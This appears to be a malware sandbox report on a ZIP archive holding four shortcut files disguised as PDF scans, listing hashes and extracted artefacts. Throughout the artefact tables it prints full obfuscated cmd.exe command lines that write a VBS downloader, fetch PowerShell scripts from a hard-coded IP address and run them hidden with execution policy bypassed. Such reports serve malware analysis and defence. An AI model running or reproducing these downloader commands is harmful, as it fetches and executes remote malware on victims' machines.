Malicious

f094a5e6f07a0d83e69aad49b5d43050

ZIP Archive
|
MD5: f094a5e6f07a0d83e69aad49b5d43050
|
Size: 143.93 KB
|
application/zip

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	f094a5e6f07a0d83e69aad49b5d43050
Sha1	9cedf7da10f1e32444e9aa0536bda580df9aaec7
Sha256	4a0edbbe5490182f27e930552cfda973f77c581bb6be1467d0087682e2d6e2f1
Sha384	5d8a038de4e8878f6e19d8886f32bbd507017352b26a3a5e86d8dc6eb6151ab89c08159cd89834a9c225c92388e51dd0
Sha512	6e8f450963f7e928273977be7d95cf9174e35485d7c2a51af173c48719560f4b48c5454e26b8cc0401a87187133766b91b8cde63f7b6775f0437eff03a00d53f
SSDeep	96:GPkdy3tC6zrUPkd13s4CmR/W3HkCvEaV36C/dJnLM:GPkdy9b4Pkd1c4tJW0YJVqIdJnLM
TLSH	0BE3DD8121FC0304F6B6BF358A7BAB85053BBAD0ED71C75C8E548C5C2964642EE71F62

File Structure

Artefacts

Name0	Value
LNK: Command Execution	cmd.exe /v /c "set "a=&" && set "v1=MSXM" && set "v2=L2.XML" && set "o1=ADOD" && set "o2=B.S" && echo Set h=CreateObject("!v1!" ^!a! "!v2!HTTP"):h.open "GET","http://193.169.194.40/S7yhd67/buggypassage.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("!o1!" ^!a! "!o2!tream"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\pzsR.ps1",2 > %TEMP%\gtP.vbs && cscript //b %TEMP%\gtP.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\pzsR.ps1 & del %TEMP%\gtP.vbs"
URLs in VB Code - #1	http://193.169.194.40/S7yhd67/buggypassage.ps1
LNK: Command Execution	cmd.exe /v /c "set "a=&" && set "v1=MSXM" && set "v2=L2.XML" && set "o1=ADOD" && set "o2=B.S" && echo Set h=CreateObject("!v1!" ^!a! "!v2!HTTP"):h.open "GET","http://193.169.194.40/S7yhd67/madlybibliography.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("!o1!" ^!a! "!o2!tream"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\VCdjhY.ps1",2 > %TEMP%\vhiO.vbs && cscript //b %TEMP%\vhiO.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\VCdjhY.ps1 & del %TEMP%\vhiO.vbs"
Deobfuscated PowerShell	& Remove-Item "%TEMP%\gtP.vbs IconLocation: imageres.dll"
Deobfuscated PowerShell	& Remove-Item "%TEMP%\gtP.vbs"
LNK: Command Execution	cmd.exe /v /c "set "a=&" && set "v1=MSXM" && set "v2=L2.XML" && set "o1=ADOD" && set "o2=B.S" && echo Set h=CreateObject("!v1!" ^!a! "!v2!HTTP"):h.open "GET","http://193.169.194.40/S7yhd67/adhesivewipe.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("!o1!" ^!a! "!o2!tream"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\ipu9.ps1",2 > %TEMP%\LM.vbs && cscript //b %TEMP%\LM.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\ipu9.ps1 & del %TEMP%\LM.vbs"
Deobfuscated PowerShell	& Remove-Item "%TEMP%\LM.vbs"
URLs in VB Code - #1	http://193.169.194.40/S7yhd67/adhesivewipe.ps1
Deobfuscated PowerShell	& Remove-Item "%TEMP%\LM.vbs IconLocation: imageres.dll"
LNK: Command Execution	cmd.exe /v /c "set "a=&" && set "v1=MSXM" && set "v2=L2.XML" && set "o1=ADOD" && set "o2=B.S" && echo Set h=CreateObject("!v1!" ^!a! "!v2!HTTP"):h.open "GET","http://193.169.194.40/S7yhd67/sleepforebear.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("!o1!" ^!a! "!o2!tream"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\psISsh.ps1",2 > %TEMP%\sGd.vbs && cscript //b %TEMP%\sGd.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\psISsh.ps1 & del %TEMP%\sGd.vbs"
URLs in VB Code - #1	http://193.169.194.40/S7yhd67/sleepforebear.ps1
Deobfuscated PowerShell	& Remove-Item "%TEMP%\sGd.vbs IconLocation: imageres.dll"
Deobfuscated PowerShell	& Remove-Item "%TEMP%\sGd.vbs"
Deobfuscated PowerShell	& Remove-Item "%TEMP%\vhiO.vbs"
URLs in VB Code - #1	http://193.169.194.40/S7yhd67/madlybibliography.ps1
Deobfuscated PowerShell	& Remove-Item "%TEMP%\vhiO.vbs IconLocation: imageres.dll"

f094a5e6f07a0d83e69aad49b5d43050 (143.93 KB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
LNK: Command Execution	cmd.exe /v /c "set "a=&" && set "v1=MSXM" && set "v2=L2.XML" && set "o1=ADOD" && set "o2=B.S" && echo Set h=CreateObject("!v1!" ^!a! "!v2!HTTP"):h.open "GET","http://193.169.194.40/S7yhd67/buggypassage.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("!o1!" ^!a! "!o2!tream"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\pzsR.ps1",2 > %TEMP%\gtP.vbs && cscript //b %TEMP%\gtP.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\pzsR.ps1 & del %TEMP%\gtP.vbs" Malicious	f094a5e6f07a0d83e69aad49b5d43050 > Scan_003.pdf.lnk
URLs in VB Code - #1	http://193.169.194.40/S7yhd67/buggypassage.ps1	f094a5e6f07a0d83e69aad49b5d43050 > Scan_003.pdf.lnk > [Lnk Summary]
LNK: Command Execution	cmd.exe /v /c "set "a=&" && set "v1=MSXM" && set "v2=L2.XML" && set "o1=ADOD" && set "o2=B.S" && echo Set h=CreateObject("!v1!" ^!a! "!v2!HTTP"):h.open "GET","http://193.169.194.40/S7yhd67/madlybibliography.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("!o1!" ^!a! "!o2!tream"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\VCdjhY.ps1",2 > %TEMP%\vhiO.vbs && cscript //b %TEMP%\vhiO.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\VCdjhY.ps1 & del %TEMP%\vhiO.vbs" Malicious	f094a5e6f07a0d83e69aad49b5d43050 > Gorschenuk_Vechernie_Zapiski.pdf.lnk
Deobfuscated PowerShell	& Remove-Item "%TEMP%\gtP.vbs IconLocation: imageres.dll" Malicious	f094a5e6f07a0d83e69aad49b5d43050 > Scan_003.pdf.lnk > [Lnk Summary] > [PowerShell Command]
Deobfuscated PowerShell	& Remove-Item "%TEMP%\gtP.vbs" Malicious	f094a5e6f07a0d83e69aad49b5d43050 > Scan_003.pdf.lnk > LNK CommandLine > [PowerShell Command]
LNK: Command Execution	cmd.exe /v /c "set "a=&" && set "v1=MSXM" && set "v2=L2.XML" && set "o1=ADOD" && set "o2=B.S" && echo Set h=CreateObject("!v1!" ^!a! "!v2!HTTP"):h.open "GET","http://193.169.194.40/S7yhd67/adhesivewipe.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("!o1!" ^!a! "!o2!tream"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\ipu9.ps1",2 > %TEMP%\LM.vbs && cscript //b %TEMP%\LM.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\ipu9.ps1 & del %TEMP%\LM.vbs" Malicious	f094a5e6f07a0d83e69aad49b5d43050 > Scan_002.pdf.lnk
Deobfuscated PowerShell	& Remove-Item "%TEMP%\LM.vbs" Malicious	f094a5e6f07a0d83e69aad49b5d43050 > Scan_002.pdf.lnk > LNK CommandLine > [PowerShell Command]
URLs in VB Code - #1	http://193.169.194.40/S7yhd67/adhesivewipe.ps1	f094a5e6f07a0d83e69aad49b5d43050 > Scan_002.pdf.lnk > [Lnk Summary]
Deobfuscated PowerShell	& Remove-Item "%TEMP%\LM.vbs IconLocation: imageres.dll" Malicious	f094a5e6f07a0d83e69aad49b5d43050 > Scan_002.pdf.lnk > [Lnk Summary] > [PowerShell Command]
LNK: Command Execution	cmd.exe /v /c "set "a=&" && set "v1=MSXM" && set "v2=L2.XML" && set "o1=ADOD" && set "o2=B.S" && echo Set h=CreateObject("!v1!" ^!a! "!v2!HTTP"):h.open "GET","http://193.169.194.40/S7yhd67/sleepforebear.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("!o1!" ^!a! "!o2!tream"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\psISsh.ps1",2 > %TEMP%\sGd.vbs && cscript //b %TEMP%\sGd.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\psISsh.ps1 & del %TEMP%\sGd.vbs" Malicious	f094a5e6f07a0d83e69aad49b5d43050 > Scan_001.pdf.lnk
URLs in VB Code - #1	http://193.169.194.40/S7yhd67/sleepforebear.ps1	f094a5e6f07a0d83e69aad49b5d43050 > Scan_001.pdf.lnk > [Lnk Summary]
Deobfuscated PowerShell	& Remove-Item "%TEMP%\sGd.vbs IconLocation: imageres.dll" Malicious	f094a5e6f07a0d83e69aad49b5d43050 > Scan_001.pdf.lnk > [Lnk Summary] > [PowerShell Command]
Deobfuscated PowerShell	& Remove-Item "%TEMP%\sGd.vbs" Malicious	f094a5e6f07a0d83e69aad49b5d43050 > Scan_001.pdf.lnk > LNK CommandLine > [PowerShell Command]
Deobfuscated PowerShell	& Remove-Item "%TEMP%\vhiO.vbs" Malicious	f094a5e6f07a0d83e69aad49b5d43050 > Gorschenuk_Vechernie_Zapiski.pdf.lnk > LNK CommandLine > [PowerShell Command]
URLs in VB Code - #1	http://193.169.194.40/S7yhd67/madlybibliography.ps1	f094a5e6f07a0d83e69aad49b5d43050 > Gorschenuk_Vechernie_Zapiski.pdf.lnk > [Lnk Summary]
Deobfuscated PowerShell	& Remove-Item "%TEMP%\vhiO.vbs IconLocation: imageres.dll" Malicious	f094a5e6f07a0d83e69aad49b5d43050 > Gorschenuk_Vechernie_Zapiski.pdf.lnk > [Lnk Summary] > [PowerShell Command]

You must be signed in to post a comment.

An error has occurred. This application may no longer respond until reloaded. Reload 🗙